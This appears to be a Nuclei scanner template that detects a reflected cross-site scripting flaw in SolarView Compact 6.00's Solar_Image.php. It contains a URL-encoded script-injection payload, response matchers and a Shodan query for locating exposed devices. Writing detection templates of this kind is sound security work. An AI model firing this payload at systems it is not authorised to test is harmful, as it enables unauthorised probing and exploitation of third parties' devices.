id: solarview-compact-xss

info:
  name: SolarView Compact 6.00 - Cross-Site Scripting
  author: ritikchaddha
  severity: high
  description: |
    SolarView Compact 6.00 contains a cross-site scripting vulnerability via fname at /Solar_Image.php.
  reference:
    - https://www.exploit-db.com/exploits/50968
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    shodan-query: http.html:"SolarView Compact"
  tags: xss,solarview,edb

requests:
  - method: GET
    path:
      - '{{BaseURL}}/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'value="test"><script>alert(document.domain)</script>">'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/23
